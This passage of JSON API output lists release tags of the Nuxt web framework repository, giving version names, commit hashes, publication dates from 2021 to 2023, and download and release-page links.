itHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/